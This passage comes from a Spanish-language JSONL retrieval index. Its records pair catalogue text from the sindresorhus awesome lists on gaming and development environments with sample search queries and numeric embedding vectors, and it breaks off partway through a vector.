engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "que programa es mejor para crear juegos de forma sencilla", "v": [-0.07984, 0.01947, -0.12639, -0.12225, 0.00591, -0.14393, -0.07682, -0.01658, -0.02722, -0.16609, -0.01643, -0.02658, -0.06571, -0.09964, 0.06407, -0.06842, 0.08092, -0.07918, 0.07485, 0.09112, -0.0258, -0.02018, -0.06565, -0.16033, -0.04237, -0.01263, 0.0888, 0.0135, -0.04879, 0.10268, -0.02392, 0.00334, 0.09246, -0.11058, -0.02673, -0.09182, 0.09765, -0.00499, -0.01189, 0.06335, -0.04917, 0.04962, 0.04961, 0.05478, -0.01417, 0.08372, 0.17934, 0.02443, -0.00387, -0.05918, 0.12639, 0.02616, 0.00201, -0.08165, 0.09095, -0.13024, -0.04243, -0.24077, -0.13218, -0.01749, -0.06287, 0.03403, -0.00144, -0.07368, 0.0233, 0.0372, 0.07109, -0.03142, -0.01756, 0.06137, 0.00707, -0.07811, 0.01228, 0.00249, 0.01, 0.08687, -0.09785, -0.09399, -0.04252, -0.04367, 0.01746, -0.10322, -0.04571, 0.05149, -0.05883, 0.04422, -0.03679, -0.03109, -0.06298, -0.04792, 0.00476, -0.02066, 0.00136, 0.09227, 0.04146, -0.11542, 0.14957, 0.03484, 0.03856, 0.11229, -0.08428, -0.09286, -0.11147, 0.10196, -0.13887, 0.02081, 0.11571, -0.01705, -0.0717, -0.00264, 0.04288, 0.01782, -0.02939, 0.0414, -0.02746, 0.00612, -0.04819, -0.01651, 0.08328, -0.0271, -0.09201, 0.05278, -0.0571, 0.00887, 0.05172, -0.02038, -0.04641, 0.06137, -0.05602, 0.07856, -0.00207, -0.0021, -0.07545, 0.04837, -0.09961, -0.04858, 0.09438, 0.06274, -0.03279, -0.03011, 0.04937, 0.10326, 0.00104, -0.04914, -0.02443, -0.00393, 0.0736, -0.05227, 0.02371, 0.05992, 0.07519, 0.04656, 0.00029, -0.03403, -0.11222, 0.06264, 0.01701, 0.00387, -0.06331, 0.07186, -0.04763, 0.03983, -0.0498, -0.07468, 0.07754, -0.05477, 0.02685, 0.07134, 0.05333, -0.00314, -0.07208, 0.0669, 0.05468, -0.11493, -0.00189, 0.02601, -0.0258, -0.04972, -0.02594, -0.05252, -0.06626, 0.01027, 0.03318, 0.03265, -0.06103, -0.13706, 0.00748, 0.04371, 0.00919, -0.04725, -0.05139, 0.03633, -0.0692, 0.01907, 0.02413, -0.03228, 0.06341, -0.04365, 0.01716, -0.0109, -0.0237, -0.05217, 0.02083, -0.02408, -0.00791, 0.11036, -0.04436, -0.05498, 0.03799, 0.0762, 0.03175, -0.02352, 0.02415, 0.00616, 0.05926, -0.03606, 0.00695, 0.03555, 0.06676, 0.00194, -0.03049, -0.07064, 0.03015, 0.00069, -0.0136, -0.06051, 0.02202, 0.08917, 0.01099, -0.02229, 0.02203, -0.08558, 0.04307, -0.03058, -0.01825, 0.01259, 0.01837, -0.02199, -0.0014, -0.0259, 0.00692, -0.0096, -0.01351, -0.04406, -0.02469, -0.01436, -0.04123, -0.01522, -0.04341, -0.0379, -0.04692, -0.03739, 0.04183, -0.00179, 0.006, 0.05414]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "busco un motor de juego libre y open source", "v": [-0.04923, -0.04433, -0.15833, -0.03634, -0.1962, -0.0641, -0.13213, 0.00959, -0.03221, -0.18321, -0.08263, -0.09233, -0.01229, 0.12059, -0.04713, -0.08379, 0.05071, -0.01022, -0.02413, -0.02259, 0.01044, -0.05537, -0.06609, -0.11197, 0.08055, 0.02369, -0.016, -0.05072, -0.13571, -0.03168, -0.02475, -0.02375, 0.15156, -0.02953, 0.02031, -0.18998, 0.11262, -0.01725, 0.08766, -0.01881, -0.0138, -0.03636, -0.08558, -0.02984, 0.03755, -0.03836, 0.11884, 0.02803, -0.00869, -0.01117, 0.04931, -0.09718, -0.02679, -0.06893, 0.07141, -0.01017, 0.06835, -0.08249, -0.03572, -0.04823, -0.11056, 0.00629, 0.04122, -0.07628, -0.06035, -0.04075, 0.06713, 0.02955, -0.01457, 0.07959, -0.08816, 0.08511, 0.04422, 0.04916, -0.05948, 0.05398, -0.06281, -0.0093, 0.01506, 0.09519, 0.03034, -0.10313, -0.07739, 0.03449, -0.0002, 0.01226, 0.19877, -0.14976, -0.01303, -0.00604, 0.10895, 0.06532, -0.08751, 0.17756, -0.03988, -0.10312, -0.0353, 0.08527, 0.06316, 0.06155, 0.04139, -0.06354, -0.0449, 0.01399, -0.0382, -0.00436, 0.11318, -0.01843, -0.07767, 0.03379, -0.04235, -0.01754, 0.00887, 0.06568, 0.01001, 0.01575, -0.06701, 0.04142, 0.11308, 0.03209, -0.07526, -0.00726, 0.03951, 0.04033, -0.02046, -0.05793, -0.0188, 0.08207, -0.03909, -0.04003, 0.06397, 0.01042, -0.09328, 0.01157, -0.06035, -0.02841, 0.05395, 0.10798, 0.01761, 0.02566, 0.02522, 0.07335, 0.06819, -0.03167, 0.06393, 0.04837, -0.01532, -0.0558, -0.02156, -0.06733, -0.01882, 0.03752, 0.01193, 0.05294, -0.04484, 0.07714, 0.08116, 0.03926, -0.03724, 0.01872, -0.0235, 0.05135, -0.11037, -0.06812, 0.03509, 0.05432, 0.05453, -0.03208, -0.01556, -0.07856, -0.03436, 0.03179, 0.03303, -0.05645, 0.03206, 0.01305, -0.02746, -0.03923, -0.07118, -0.04612, -0.01482, 0.0233, -0.02928, 0.01729, -0.13711, -0.0257, 0.04606, -0.13238, 0.03963, 0.0052, 0.00251, 0.0461, -0.0846, 0.02403, 0.06037, 0.0219, 0.02224, -0.00292, 0.02222, -0.00943, -0.05425, -0.00786, -0.03326, -0.05534, -0.0545, 0.05144, 0.01663, -0.02132, -0.08167, 0.05728, 0.03833, 0.02503, 0.0893, 0.02695, 0.04916, -0.00798, 0.0351, -0.01514, 0.05158, -0.03591, -0.01124, 0.0083, 0.06169, -0.05843, 0.03696, -0.03694, 0.04159, 0.03088, 0.06002, 0.02541, -0.01004, 0.03305, -0.03958, -0.00496, 0.0377, 0.03904, 0.0174, 0.03705, -0.02716, -0.00092, 0.06614, -0.00903, -0.0344, -0.09189, 0.02676, -0.11445, 0.01181, -0.06025, -0.03268, -0.04535, -0.12508, -0.03258, -0.02437, -0.00869, -0.03828, 0.03313]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Development. Game Talks. Godot β€” Game engine. Open Source Games. Unity β€” Game engine. Chess. LΓ–VE β€” Game engine. PICO-8 β€” Fantasy console. Game Boy Development. Construct 2 β€” Game engine. Gideros β€” Game engine. Minecraft β€” Sandbox video game. ComputerCraft β€” Minecraft mod that adds programmable computers. Game Datasets β€” Materials and datasets for Artificial Intelligence in games. Haxe Game Development β€” A high-level strongly typed programming language used to produce cross-platform native code. libGDX β€” Java game framework. PlayCanvas β€” Game engine. Game Remakes β€” Actively maintained open-source game remakes. Flame β€” Game engine for Flutter. Discord Communities β€” Chat with friends and communities. CHIP-8 β€” Virtual computer game machine from the 70s. Games of Coding β€” Learn a programming language by making games. Esports β€” Video games played as a sport. Learn Gamedev β€” The craft of video game creation. Game Engine Development β€” Building software to speed up game creation. GameMaker β€” Game engine.", "indexar": "con quΓ© puedo hacer juegos que funcionen en varios sistemas", "v": [-0.08976, 0.15024, -0.14895, -0.01761, 0.01561, -0.07897, -0.05852, -0.04668, -0.08366, -0.14337, -0.07539, 0.07294, -0.02448, -0.01327, 0.16049, -0.02292, 0.06126, -0.06282, -0.0013, -0.00625, -0.09389, -0.16435, -0.06003, -0.1063, -0.07256, 0.06226, 0.1275, -0.04845, -0.13693, 0.0657, -0.01258, 0.00246, 0.2281, -0.14587, -0.10438, -0.08316, -0.04992, 0.12413, 0.07814, 0.00736, 0.01326, 0.03122, -0.0853, -0.114, 0.06433, 0.03121, 0.02402, -0.06575, -0.00953, -0.10523, -0.0066, -0.02784, -0.04705, -0.11236, 0.03762, -0.18815, 0.01361, -0.10547, 0.02981, 0.02296, -0.09591, 0.03949, 0.04664, -0.04429, 0.06093, 0.05609, -0.022, -0.05094, -0.00135, 0.09237, -0.02253, 0.04287, -0.03821, 0.0536, 0.02735, 0.12385, -0.02956, -0.01223, -0.06241, 0.00056, -0.03247, -0.05313, -0.11221, 0.07184, -0.00451, -0.06139, -0.03035, -0.03959, -0.03185, -0.12754, 0.04484, -0.02957, 0.01988, 0.05415, 0.04956, -0.04253, 0.035, 0.06476, -0.02187, 0.07692, -0.00682, -0.038, -0.11614, 0.05959, -0.18461, -0.04611, 0.10018, -0.01003, 0.05952, -0.07194, -0.02351, 0.01496, -0.10184, -0.04188, -0.07505, 0.00867, -0.08071, -0.02397, 0.02561, 0.04589, -0.14855, 0.04271, 0.07489, -0.01642, 0.09513, -0.04834, 0.028, 0.08873, -0.01926, 0.02418, 0.00145, -0.02491, -0.04929, 0.04268, -0.03373, -0.00878, 0.03022, 0.06233, -0.04222, -0.0096, 0.06658, 0.08427, 0.04592, -0.01159, 0.0331, 0.05977, 0.12978, -0.08615, -0.05027, -0.07595, 0.02933, 0.037, -0.04038, 0.01617, 0.02491, 0.01844, 0.09071, -0.034, -0.0343, 0.04807, -0.04207, 0.05286, -0.02407, 0.04725, -0.0073, 0.00646, -0.01884, -0.00862, 0.03433, 0.00332, -0.07699, 0.08979, 0.01252, -0.11121, 0.07249, -0.00017, -0.0541, -0.01708, 0.02036, -0.05198, -0.0718, 0.03688, 0.01346, 0.00539, -0.03257, -0.02273, -0.03091, -0.04865, -0.00626, 0.0688, 0.00213, 0.07995, -0.08457, 0.01134, 0.01994, -0.00884, 0.03979, -0.0623, -0.00212, 0.01313, -0.00289, 0.03267, 0.03826, -0.07678, 0.01819, 0.08172, 0.0005, 0.03439, 0.00433, 0.01476, 0.06852, 0.01739, 0.04569, 0.00444, -0.00576, -0.0121, 0.01501, 0.02192, -0.01625, -0.07254, 0.04787, -0.00585, 0.04178, 0.00072, 0.0184, 0.02045, 0.04244, 0.02181, -0.00099, 0.01611, 0.00357, -0.05507, -0.00295, -0.00883, 0.0301, 0.0516, 0.01864, -0.02893, -0.04515, -0.00797, 0.0413, 0.03076, -0.00307, -0.07428, 0.00185, -0.10495, -0.06059, -0.04464, -0.00716, -0.10196, -0.08035, 0.0114, -0.00287, -0.01299, 0.02078, -0.00778]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "que programa sirve para crear juegos para la web", "v": [-0.06999, 0.00796, -0.11282, -0.17519, 0.02878, -0.14906, -0.06795, -0.01856, 0.05564, -0.1445, -0.02297, -0.07933, -0.03021, -0.10627, -0.00929, -0.01289, 0.0897, -0.0873, 0.11631, 0.07309, -0.02297, 0.04319, -0.02981, -0.14191, -0.09762, 0.02411, 0.08489, -0.05382, -0.07888, 0.10772, -0.06112, -0.01057, 0.07591, -0.09453, -0.01732, -0.08254, 0.09767, 0.02214, -0.01505, 0.08616, 0.01547, 0.02613, -0.03686, 0.02245, 0.0123, 0.06491, 0.17397, -0.04634, -0.00163, -0.0111, 0.05767, 0.04768, -0.06679, -0.05812, 0.07933, -0.10662, -0.03206, -0.24122, -0.1257, -0.00887, -0.12272, -0.00238, 0.01922, -0.10204, 0.0077, 0.00535, 0.02208, 0.03676, -0.01656, 0.0782, -0.02429, -0.02923, 0.06295, -0.0346, 0.01397, 0.02594, -0.10325, -0.04081, -0.01008, -0.08215, 0.02506, -0.06024, -0.05904, 0.08258, -0.05263, 0.03307, 0.00341, -0.03598, -0.00198, -0.07005, 0.02295, 0.10528, -0.03464, 0.04812, 0.03598, -0.14632, 0.17083, -0.00649, 0.08586, 0.07772, -0.03261, -0.09091, -0.09908, 0.05871, -0.09959, 0.06706, 0.14594, 0.00773, -0.07644, 0.02158, 0.03146, 0.00581, -0.06946, -0.00216, -0.00667, 0.02655, -0.0098, 0.00119, 0.12165, -0.01526, -0.10315, 0.08004, -0.03839, 0.03573, -0.02399, 0.01357, -0.02676, 0.05884, -0.06818, 0.05679, -0.00442, -0.03265, -0.065, 0.0355, -0.09748, -0.05693, 0.05946, 0.04956, -0.04039, 0.02659, 0.07673, 0.08213, -0.02098, 0.01895, -0.00064, 0.00915, 0.0613, -0.04006, -0.00706, -0.00572, 0.02286, 0.04266, -0.04143, -0.01031, -0.12336, 0.01528, -0.00649, 0.01107, -0.10184, 0.03526, -0.0758, 0.04528, 0.00296, -0.04882, 0.05891, -0.01384, -0.05278, 0.06274, 0.08751, 0.06649, -0.06554, 0.07446, 0.05351, -0.14895, 0.04266, 0.06176, -0.04334, -0.04787, -0.01159, -0.06484, -0.05384, -0.037, 0.04931, 0.08198, -0.09257, -0.10321, -0.00581, -0.01638, -0.02898, 0.00579, -0.07638, 0.01776, -0.08734, 0.0408, 0.03438, -0.00677, 0.03706, -0.07268, 0.05427, -0.04696, -0.0148, -0.01862, 0.00887, -0.02466, -0.01776, 0.10809, 0.00485, -0.05129, 0.02704, 0.0787, 0.01597, -0.02274, 0.02274, 0.02238, 0.03807, -0.06575, 0.05235, 0.03401, 0.05534, 0.01218, -0.01916, -0.07686, -0.02726, 0.03342, 0.01739, -0.03527, 0.04022, 0.01409, 0.0258, -0.0197, 0.00899, -0.08881, -0.00579, -0.01338, -0.01549, -0.00792, 0.02536, 0.00305, -0.0338, -0.02401, -0.03421, -0.00398, -0.02952, -0.0443, 0.0128, -0.05541, -0.02268, -0.04151, -0.02769, -0.0243, -0.08258, -0.02056, 0.00313, -0.00066, 0.0031, 0.09593]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "con que puedo desarrollar experiencias interactivas en el navegador", "v": [0.12455, 0.12122, -0.21082, -0.14368, 0.02484, -0.03662, 0.01809, 0.06685, -0.01526, -0.16032, -0.01264, -0.02788, -0.08639, -0.07088, 0.0038, 0.12451, 0.14603, 0.02125, -0.00533, -0.01705, -0.00646, 0.03349, -0.14525, -0.01568, 0.07786, -0.04685, -0.15319, -0.01625, 0.1243, -0.01165, -0.07884, -0.0148, 0.05262, 0.022, -0.06316, -0.05349, 0.05741, -0.00661, 0.10174, -0.09857, -0.00908, 0.02921, -0.10262, 0.06034, 0.06161, 0.04054, -0.08806, -0.11536, -0.06471, -0.05925, -0.01284, 0.0319, -0.10669, 0.0191, 0.00131, -0.0327, 0.1273, -0.18513, 0.05698, -0.0379, 0.08284, 0.0426, 0.01051, 0.01493, 0.03292, -0.11624, 0.02824, -0.01523, -0.08287, 0.11211, 0.03015, 0.06252, 0.02986, -0.01595, 0.03754, 0.07793, 0.04296, -0.00304, 0.04995, 0.06933, 0.07362, 0.03708, 0.01982, 0.02717, 0.01451, -0.05839, -0.03034, -0.09578, 0.08923, -0.06532, 0.14082, 0.0895, -0.01498, -0.0556, -0.12607, -0.11544, 0.15515, 0.02054, 0.1102, -0.05977, -0.06656, 0.01357, -0.04857, 0.12433, 0.03439, -0.02097, 0.06762, 0.01437, 0.0267, -0.0423, 0.04617, 0.0053, -0.03076, -0.05425, -0.02846, 0.11426, -0.08771, -0.08333, -0.01898, -0.09297, -0.10363, -0.00996, -0.08085, 0.00285, 0.01499, 0.11631, -0.09792, 0.02465, 0.03812, 0.01616, 0.00905, -0.10629, -0.00117, 0.0035, 0.02281, 0.0355, 0.00371, 0.01125, 0.0582, -0.01178, 0.0742, -0.01297, -0.02504, -0.01026, -0.00646, 0.01058, -0.03832, 0.0214, -0.03708, -0.007, -0.03861, -0.08646, 0.04552, 0.04117, -0.05927, 0.01954, 0.01255, -0.01126, -0.01042, 0.06684, -0.08344, 0.00031, 0.01435, 0.10626, -0.01453, -0.03036, -0.12618, -0.06353, 0.07946, 0.0226, -0.03118, 0.05199, 0.08888, -0.08974, -0.01817, 0.03372, -0.04611, 0.00319, -0.01781, -0.08205, 0.05857, -0.02518, -0.06812, -0.03321, -0.1092, -0.11992, -0.06767, -0.03158, -0.05402, 0.02926, -0.03669, 0.04137, -0.02319, 0.03738, 0.14364, -0.0228, 0.02904, 0.02927, -0.072, -0.00466, -0.00289, 0.0122, 0.00247, -0.01052, -0.0005, 0.03061, 0.00255, 0.04102, 0.03923, 0.00816, 0.02908, -0.01773, 0.10826, -0.01316, -0.01294, -0.03072, 0.02949, 0.02347, -0.01111, 0.01627, -0.0126, 0.02279, 0.00836, -0.01446, 0.06024, 0.00817, 0.04886, 0.01621, -0.02046, 0.01634, 0.01615, -0.00945, -0.02747, 0.04368, 0.05623, 0.01143, 0.01258, 0.00396, -0.02852, 0.00068, -0.02274, 0.07154, 0.01163, 0.02242, 0.01669, -0.07412, -0.06118, 0.00141, -0.01718, -0.04588, -0.09113, 0.00411, 0.06975, -0.02118, -0.04907, -0.00352]} -{"tipo": "pregunta", "herramienta": "Gaming", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Gaming", "tema": "gaming", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Gaming: Game Production β€” Leading the process of designing, developing, testing and distributing a video game from concept to release. Babylon.js β€” Game engine for cross-platform web and native game development. Roblox β€” Immersive platform for hosting millions of diverse experiences.", "indexar": "cual es una alternativa gratuita a los motores de videojuegos tradicionales", "v": [0.29892, -0.00679, 0.04028, 0.0172, -0.09813, 0.12047, 0.028, -0.09515, -0.00455, -0.1932, 0.00167, -0.14516, 0.04952, 0.06851, 0.04956, 0.03731, 0.18231, -0.07354, 0.11201, -0.06987, 0.03224, -0.11867, -0.1065, -0.12308, 0.01821, 0.03867, 0.00548, 0.02135, -0.17293, 0.02954, 0.01246, 0.07084, 0.14087, -0.09319, -0.09612, -0.08464, 0.06511, 0.07026, 0.04503, -0.03805, 0.0769, -0.05782, -0.0688, -0.08701, -0.031, -0.08691, -0.00463, 0.00784, -0.0386, -0.04524, 0.06251, 0.01252, 0.00965, -0.0284, 0.07864, -0.07787, 0.1064, -0.09581, -0.0625, -0.0833, -0.04469, 0.08731, 0.06657, 0.02982, -0.03343, 0.02377, -0.01979, -0.03858, -0.08114, 0.05485, -0.00443, 0.0962, 0.06272, -0.02944, -0.04101, 0.06894, -0.00132, 0.01926, -0.06275, 0.05628, 0.10452, -0.09164, 0.02703, 0.0081, -0.03116, 0.01753, -0.03342, -0.13505, 0.00726, -0.13468, 0.01369, 0.05844, 0.01907, 0.11554, -0.01939, -0.08841, 0.07889, 0.03841, -0.00561, 0.08031, 0.04443, -0.0219, -0.07277, 0.06086, 0.00309, -0.06718, 0.08468, 0.00673, -0.0263, -0.01698, 0.01857, 0.05563, -0.03279, 0.09411, -0.00829, 0.03357, -0.09484, 0.02837, 0.06642, 0.05721, -0.09832, 0.05933, 0.04247, -0.03062, -0.01537, 0.02494, -0.0541, 0.01165, -0.05644, -0.02492, 0.09301, -0.05155, -0.0328, -0.04583, -0.09881, -0.01549, 0.07955, 0.01218, 0.03579, 0.01346, 0.14847, 0.08409, 0.03884, -0.05671, 0.03924, 0.02541, 0.07919, -0.06244, -0.00772, -0.06809, -0.03575, -0.01526, 0.01152, 0.06182, -0.01953, 0.07854, -0.05842, -0.0023, -0.05558, 0.09189, 0.04635, 0.00633, -0.0119, -0.06291, -0.07017, 0.00797, 0.00156, -0.0079, -0.04475, -0.01334, -0.01963, 0.00514, -0.01813, -0.02825, 0.04334, 0.06112, -0.02548, -0.00994, 0.02037, -0.0152, -0.05182, 0.03191, -0.1153, -0.0008, -0.07674, -0.03842, 0.01056, -0.01511, 0.03119, 0.00065, -0.02797, -0.00258, -0.10182, -0.00948, 0.0418, 0.01233, 0.00313, -0.05201, -0.06307, -0.02216, -0.00124, 0.05192, -0.0666, -0.09576, -0.06974, 0.02086, 0.02323, -0.02848, -0.03428, 0.02385, 0.009, 0.02916, 0.02943, 0.01774, 0.03218, -0.04002, 0.00107, -0.02881, -0.0083, -0.03693, 0.02593, -0.03464, 0.04663, -0.03289, -0.01728, 0.057, 0.05439, 0.10377, -0.03776, -0.03871, 0.01932, 0.04348, 0.00189, 0.05106, 0.00253, 0.11504, -0.00637, -0.00112, -0.08729, 0.03126, 0.04702, -0.01557, -0.02212, -0.02136, -0.03213, -0.07185, -0.0392, -0.10334, -0.01907, -0.01757, -0.08342, 0.02847, -0.00774, 0.03106, -0.00994, 0.03732]} -{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "que programa puedo usar para mejorar mi entorno de desarrollo en macOS?", "v": [-0.08562, 0.09398, -0.15691, -0.1903, -0.03698, 0.00312, -0.13906, 0.03714, -0.17249, -0.10189, -0.14858, -0.04266, -0.05081, -0.08463, -0.09833, -0.06655, 0.07444, -0.06258, -0.04029, 0.04424, 0.02992, -0.07963, -0.14306, -0.02857, 0.00576, 0.11531, -0.04037, -0.11308, -0.08942, -0.01973, 0.03955, 0.11795, -0.00287, -0.03243, -0.0677, -0.14965, -0.04889, -0.15107, 0.04296, 0.01186, -0.02824, -0.02252, 0.02462, -0.00332, 0.14419, -0.01198, 0.08888, -0.00737, -0.10798, -0.06786, -0.04584, -0.07475, 0.03123, 0.00044, 0.10886, -0.04705, 8e-05, -0.13949, 0.00667, 0.02249, -0.09094, 0.03216, 0.01427, -0.08044, 0.10915, -0.13841, -0.00635, 0.01585, -0.12318, 0.05595, -0.05835, 0.03358, 0.02873, -0.01301, 0.03029, 0.05296, 0.04357, -0.10383, 0.07066, -0.00955, -0.05458, 0.01944, 0.04482, 0.12987, -0.13502, 0.00158, 0.07541, -0.01239, 0.06735, 0.00692, -0.01836, 0.00342, -0.03488, -0.06243, 0.04656, -0.09178, 0.1121, 0.04759, 0.03516, 0.03834, -0.01103, -0.0967, -0.0762, 0.07011, -0.05758, 0.07024, 0.11464, -0.09284, -0.09129, 0.00566, -0.02449, -0.00606, 0.04157, -0.03307, -0.11467, -0.02737, 0.02458, -0.07866, -0.01857, -0.10713, -0.05219, -0.00359, -0.04447, -0.05241, 0.07004, 0.0405, -0.01053, 0.09792, -0.01085, 0.10986, -0.01995, -0.03397, 0.02568, -0.03284, -0.10172, 0.0036, 0.00469, -0.00305, -0.00743, 0.01741, 0.00745, 0.04235, -0.00907, 0.0322, -0.00171, -0.02953, -0.06202, -0.06814, -0.01706, -0.02278, 0.05949, -0.01669, 0.0498, -0.00091, -0.12355, -0.00048, 0.0447, -0.01017, 0.05901, 0.02829, -0.0675, 0.0138, -0.00821, 0.03556, 0.06311, -0.01965, 0.06373, -0.00269, 0.04778, 0.0342, -0.03737, 0.04894, 0.04337, -0.10353, -0.00069, -0.03419, -0.00792, -0.0059, -0.00142, 0.00468, -0.05949, 0.06148, 0.01393, 0.00704, -0.04883, -0.00575, 0.01297, 0.02629, -0.02604, 0.00257, -0.04514, 0.01575, 0.0757, -0.04978, 0.01714, -0.05402, -0.03349, -0.01607, -0.02101, -0.07824, -0.08473, 0.01886, 0.01234, -0.02081, 0.11273, 0.06116, -0.01514, 0.01598, 0.00125, 0.08477, 0.02375, -0.02525, 0.09667, 0.05089, -0.04548, 0.01722, 0.05631, 0.07373, 0.05169, 0.01626, -0.00608, 0.02573, 0.02664, 0.01928, 0.02831, -0.05641, -0.0048, 0.0099, 0.04419, 0.00266, -0.00475, 0.0068, -0.06105, -0.08208, 0.00673, 0.012, -0.00405, -0.04358, -0.0461, -0.05817, -0.01296, 0.11203, -0.00551, -0.08109, -0.0702, -0.00572, -0.09141, -0.02004, -0.01982, -0.03527, -0.0355, -0.00348, 0.0668, -0.08624, 0.03468, 0.09468]} -{"tipo": "pregunta", "herramienta": "Development Environment", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Development Environment", "tema": "development environment", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Development Environment: Quick Look Plugins β€” For macOS. Dev Env. Dotfiles. Shell. Fish β€” User-friendly shell. Command-Line Apps. ZSH Plugins. GitHub β€” Hosting service for Git repositories. Browser Extensions. Cheat Sheet. Pinned Gists β€” Dynamic pinned gists for your GitHub profile. Git Cheat Sheet & Git Flow. Git Tips. Git Add-ons β€” Enhance the CLI [git]. Git Hooks β€” Scripts for automating tasks during workflows [git]. SSH. FOSS for Developers. Hyper β€” Cross-platform terminal app built on web technologies. Terminals Are Sexy. GitHub Actions β€” Create tasks to automate your workflow and share them with others on GitHub. WezTerm β€” Powerful cross-platform terminal emulator.", "indexar": "hay alguna alternativa gratuita a Git que me ayude a automatizar mis tareas?", "v": [-0.06505, 0.22061, -0.18341, -0.01583, -0.01833, 0.07284, -0.1094, 0.031, -0.27797, 0.10973, -0.05987, -0.11376, 0.05341, 0.2068, 0.154, -0.05095, 0.12432, 0.00125, 0.05481, 0.07527, 0.02591, 0.02588, 0.04053, -0.10896, -0.15421, -0.03807, -0.01205, -0.11559, -0.12895, 0.09302, 0.04706, 0.05859, 0.01793, -0.13983, -0.09666, 0.02668, 0.1167, 0.05598, 0.09453, -0.08346, -0.01157, -0.01457, -0.06066, 0.07304, 0.06176, -0.07748, 0.0125, 0.0069, -0.03861, -0.01645, -0.04186, -0.16207, 0.00394, -0.0632, 0.00545, 0.0243, 0.16244, -0.09998, -0.11732, -0.0915, -0.00194, 0.07658, 5e-05, 0.05222, -0.03401, 0.0652, 0.02881, -0.03819, -0.05464, 0.14204, 0.02249, 0.06378, -0.00467, -0.06844, -0.08036, -0.01598, -0.0897, 0.00197, -0.02637, 0.06649, 0.05773, -0.00804, 0.0227, 0.05848, -0.06231, -0.1096, -0.02242, -0.02522, 0.05567, -0.08218, 0.00238, -0.00401, -0.04052, 0.12553, -0.03727, 0.00022, 0.07203, -0.03847, 0.01094, 0.05439, 0.05885, -0.05233, -0.02356, 0.05369, 0.00693, 0.05231, -0.05298, 0.03868, -0.00862, -0.05309, 0.02515, 0.02356, 0.0181, -0.01831, -0.00152, 0.00444, -0.02314, 0.02336, -0.03552, -0.03037, -0.0239, 0.06494, -0.01677, -0.01618, 0.06893, 0.03822, 0.0868, 0.07382, -0.03898, 0.02331, 0.0298, -0.00222, -0.0354, -0.08079, -0.07641, 0.04485, 0.07355, -0.06931, -0.0749, -0.08509, -0.00553, 0.0502, 0.03549, -0.04895, 0.04225, 0.02003, 0.0625, -0.08983, 0.04907, -0.04586, -0.0263, -0.04163, 0.05567, 0.03572, 0.01931, 0.06965, 0.01437, 0.06441, -0.00371, 0.04965, 0.04906, 